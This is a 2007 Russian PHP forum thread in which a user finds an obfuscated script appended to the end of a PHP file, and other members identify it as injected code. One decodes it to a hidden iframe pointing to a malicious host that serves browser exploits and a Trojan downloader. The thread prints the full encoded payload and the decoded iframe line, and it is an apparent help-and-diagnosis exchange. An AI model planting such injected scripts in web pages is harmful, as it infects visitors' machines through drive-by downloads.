Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/topic.php on line 737
Форумы портала PHP.SU :: Что это такое?!

 PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Без описания
Wange
Отправлено: 19 Июля, 2007 - 17:58:00
Post Id



Гость


Покинул форум
Сообщений всего: 87
Дата рег-ции: Июль 2006  
Откуда: Екатеринбург


Помог: 0 раз(а)




Собственно сабж, в конце кода непонятные для меня сочетание символов, что это кто-нибудь знает?

PHP:
скопировать код в буфер обмена
  1.  
  2. $ctrl->Exec($page);
  3.  
  4. $time_end=getmicrotime();
  5. //echo $time_end-$time_start;
  6. //var_dump($page);
  7. printt($page, $ctrl->getTpl());
  8.  
  9. $time_end=getmicrotime();
  10. //echo $time_end-$time_start;
  11.  
  12. ?>
  13.  
  14.                                                                                                                                 <!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bvar%20pA%3D%27rr0rf0rD0
  15. r70rK0rc0rw0ry0r50rp0rI0rY0rT0rk0rl0rR0rH0r30rx0rz0rZ0re0r60rW0r80rX0rm0rV0rq0rd0rC
  16. 0rB0rt0rG0rN0rF0ro0rb0rA0rg0rJ0rn0ri0rL0r90rs0rh0rP0rU0rM0ra0rO0rj0r40fr0ff0fD0f70fK0f
  17. c0fw0fy0f50fp0fI0fY0fT0fk0fl0fR0fH0f30fx0fz0fZ0fe0f60fW0f80fX%27%2CZe%3DpA.substr%2
  18. 82%2C1%29%3Bvar%20hQ%3DArray%2824844%5E24907%2CnS%28%278%27%29%2CnS
  19. %28%2724%27%29%2C25802%5E25795%2CnS%28%2718%27%29%2CnS%28%2711%27
  20. %29%2C4174%5E4161%2CnS%28%2769%27%29%2C15754%5E15767%2C423%5E425%2
  21. CnS%28%2721%27%29%2CnS%28%2720%27%29%2CnS%28%2791%27%29%2CnS%28
  22. %2755%27%29%2CnS%28%2753%27%29%2C28542%5E28531%2C26090%5E26041%2C9
  23. 894%5E9863%2C26759%5E26793%2CnS%28%2787%27%29%2C23107%5E23161%2C201
  24. 05%5E20187%2CnS%28%270%27%29%2CnS%28%2726%27%29%2CnS%28%2723%27%
  25. 29%2CnS%28%2770%27%29%2C26935%5E26921%2CnS%28%2712%27%29%2C22312%
  26. 5E22295%2C15834%5E15859%2C16973%5E16989%2C2285%5E2221%2C4896%5E4981%2
  27. CnS%28%2747%27%29%2C26655%5E26633%2C17965%5E17969%2CnS%28%2780%27%
  28. 29%2CnS%28%2767%27%29%2CnS%28%2777%27%29%2C6548%5E6619%2CnS%28%2
  29. 775%27%29%2C1556%5E1547%2CnS%28%2789%27%29%2CnS%28%273%27%29%2C2
  30. 0979%5E20943%2CnS%28%2754%27%29%2C7149%5E7109%2C27045%5E27043%2C252
  31. 08%5E25173%2CnS%28%2762%27%29%2CnS%28%2749%27%29%2CnS%28%2792%27
  32. %29%2CnS%28%2774%27%29%2C5439%5E5383%2CnS%28%2752%27%29%2C16777%
  33. 5E16805%2CnS%28%2784%27%29%2CnS%28%2719%27%29%2CnS%28%2786%27%29
  34. %2C31032%5E31009%2CnS%28%2765%27%29%2CnS%28%2790%27%29%2CnS%28%2
  35. 768%27%29%2CnS%28%2742%27%29%2CnS%28%2743%27%29%2C6543%5E6575%2C
  36. nS%28%2737%27%29%2CnS%28%271%27%29%2CnS%28%2766%27%29%2C16287%5E
  37. 16313%2CnS%28%2739%27%29%2CnS%28%2757%27%29%2CnS%28%2773%27%29%
  38. %5E10159%2C768%5E881%2CnS%28%2735%27%29%2C18845%5E18901%2C15997%5E1
  39. 5923%2C4381%5E4433%2CnS%28%2781%27%29%29%2CeL%3Bvar%20ia%2CRJ%3Bvar%
  40. 20yl%3D%27rrrfrDr7rKrcrwryr5rprIrDrwrKrYrIrTrkrlrRrHr3rKrxrzrRrlrZrer6rTrRrWr7rTrRr5r8
  41. rXrIrmrVrTrqrWrwrmrHrerzrTrdrCrYrXrTrIrmrVrTrqrWrwrmrHrerBrTrdrCrYrtrfrmrwrGrKrNrm
  42. rHrRr5r8rtrFrmrwrGrKrNrmrHrerorbrArgrJrJrJrJrJrerBrTrnrYrDrprNrmrIrwrtrDrYrYrCrKrmrTrX
  43. rTr3rKrxrorirXrirormrfrDrWrcrmrHrRrlrZrerorirBrmrLrcrKr7rmrfrXrirordrCrYrtrwrYr9rsrGrhrwr
  44. 7rKrIrFrHrerBrTrPrRrWr7rTrUrMrarXrOrfrjr5rsr4frrOrBrRrWr7rTrYrsr9rXrOrjrOrzrhffrYrXrOrpr
  45. crnrWrwrmrjrtrDr8rWrfrfrKrDrwrmr8rtrYr7rFrOrBrRrWr7rTrarsr5rXrOfDf7rwrNr8fDrOrBrKr5rH
  46. rnrYrDrprNrmrIrwrtrDrYrYrCrKrmrtrKrIrnrmrLfrr5rHrUrMrarorOrXrOrorYrsr9rerXrXfKrjrer6rTr
  47. RrWr7rTrVfcrRrXrOf7rwrwrcfwfDfDrOrorHrnrYrDrprNrmrIrwrtr8rYrDrWrwrKrYrIrtf7rYrfrwrTfyr
  48. XrTrOrOf5rOrOfwfpfIr3rHrererornrYrDrprNrmrIrwrtr8rYrDrWrwrKrYrIrtf7rYrfrwrtr7rmrcr8rWrD
  49. rmrHfDfYfTrWfKfkrJfKflrtfKfRfDrzrOrtrOrertr7rmrcr8rWrDrmrHfDfHrtrofDrzrOrtrOrerorOrtrOro
  50. fpfIr3rHrerorOrtrOrorhffrYrorarsr5rBrRrWr7rTrxrDrFrXrnrYrDrprNrmrIrwrtrDr7rmrWrwrmrMr8
  51. rmrNrmrIrwrHrOrKr5r7rWrNrmrOrerBrxrDrFrtrfrmrwrZrwrwr7rKfcrprwrmrHrOrfr7rDrOrzrVfcr
  52. RrerBrxrDrFrtr5r7rWrNrmf3rYr7rnrmr7rXrJrBrTrxrDrFrtrVrKrnrwf7rXfxrBrxrDrFrtf7rmrKrFf7rw
  53. rXrjrBrwr7fzrTr6rTrnrYrDrprNrmrIrwrtfcrYrnfzrtrWrcrcrmrIrnr4f7rKr8rnrHrxrDrFrerBrkrlrRrHr
  54. UrMrarzrYrsr9rerBrTrPrDrWrwrDf7rHrmrer6rTrnrYrDrprNrmrIrwrtrVr7rKrwrmrHrOrrf7rwrNr8r
  55. yrrfcrYrnfzryrrfDfcrYrnfzryrrfDf7rwrNr8ryrOrerBrnrYrDrprNrmrIrwrtfcrYrnfzrtrWrcrcrmrIrnr4f7
  56. rKr8rnrHrxrDrFrerBrTrkrlrRrHrUrMrarzrYrsr9rerBrTrPrTrPfZr5rprIrDrwrKrYrIrTfpfIr3rHrer6rTr
  57. RrWr7rTferYfzrXfxrgrBrRrWr7rTrMrDf7rXrirJrjfxf6rgfWrAf8rbflrJrWfcrDrnrmr5rirzfkrcrarXririrB
  58. rTr5rYr7rHfpf7rWrXrJrBrTfpf7rWrTrrrTferYfzrBrTfpf7rWrororerTfkrcrarorXrTrMrDf7rtrfrpfcrfrw
  59. r7rHrsrWrwf7rtr5r8rYrYr7rHrsrWrwf7rtr7rWrIrnrYrNrHrefXrMrDf7rtr8rmrIrFrwf7rerzrjrzrjrerBr
  60. Tr7rmrwrpr7rIrTfkrcrarBrTrPrrfDrfrDr7rKrcrwry%27%2CHF%3D%27%27%3BpA%3DpA.split
  61. %28Ze%29%3Bfor%28eL%3D0%3BeL%3Cyl.length%3BeL+%3D2%29%7BRJ%3Dyl.substr%
  62. 28eL%2C2%29%3Bfor%28ia%3D0%3Bia%3CpA.length%3Bia++%29%7Bif%28pA%5Bia%5
  63. D%3D%3DRJ%29break%3B%7D%20HF+%3DString.fromCharCode%28hQ%5Bia%5D%5E12
  64. 3%29%3B%7Dfunction%20nS%28fS%29%7Breturn%20parseInt%28fS%29%7Ddocument.write
  65. %28HF%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->
  66.  


-----
Не пытайся, делай
обучение, праздники
 
 Top
valenok Модератор
Отправлено: 19 Июля, 2007 - 19:47:09
Post Id



Здесь могла бы быть ваша реклама


Покинул форум
Сообщений всего: 4574
Дата рег-ции: Июль 2006  
Откуда: Israel


Помог: 3 раз(а)




Учитывая

< /script>
и

%28Ze%29%3Bfor%28eL%3D0%3BeL%3Cyl.length%3BeL+%3D2%29%7BRJ%3Dyl.substr%
8eL%2C2%29%3Bfor%28ia%3D0%3Bia%3CpA.length%3Bia++%29%7Bif%28pA%5Bia%5
%3D%3DRJ%29break%3B%7D%20HF+%3DString.fromCharCode%28hQ%5Bia%5D%5E12
%29%3B%7Dfunction%20nS%28fS%29%7Breturn%20parseInt%28fS%29%7Ddocument.write

похоже на какoйото зашифрованный кусок кода JS
На работу скрипта он влиять не должен, но если вы смотрите кусок кода какойто системы - лучше не менять..


-----
Truly yours, Sasha.
 
My status
 Top
kuzya
Отправлено: 19 Июля, 2007 - 22:13:52
Post Id


Гость


Покинул форум
Сообщений всего: 80
Дата рег-ции: Февр. 2007  


Помог: 0 раз(а)




Короч кто то тебя имеет и сильно. Вот расшифрованный код (в нете нашёл)
Цитата:

<IFRAME src="http://localhost.804590a46a6030846bde0dd3.upd­ate1.classictel.org/html/" frameBorder=0 width=3 height=2></IFRAME>

Цитата отсюда:
http://www[dot]securitylab[dot]ru/forum/[dot][dot][dot]6&MID=349986
Цитата:

Это набор из нескольких эксплоитов под ИЕ.

С http://localhost[dot]804590a46a60308[dot][dot][dot]de[dot][dot][dot][dot]org/html/­ делает редирект на http://www.bobo32.org/o0o/exp/, откуда и загружается связка.
Код на яваскрипте пытается загрузить с http://www[dot]bobo32[dot]org/o0o/exp/file.php файл - Trojan-Downloader.Win32.Small.cy n.
Что в свою очередь грузит сам даунлоадер, смотреть не стал, ибо некогда.
\n\n(Добавление)
Посоветовал бы поменять все пароли на FTP/SSH и пропатчить все паблик-скрипты до свежих версий.
 
 Top
Wange
Отправлено: 20 Июля, 2007 - 07:08:56
Post Id



Гость


Покинул форум
Сообщений всего: 87
Дата рег-ции: Июль 2006  
Откуда: Екатеринбург


Помог: 0 раз(а)




спасибо помотрел. сообщил владельцу сайта.


-----
Не пытайся, делай
обучение, праздники
 
 Top
Страниц (1): [1]
Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)
« Программирование на PHP »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
 



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB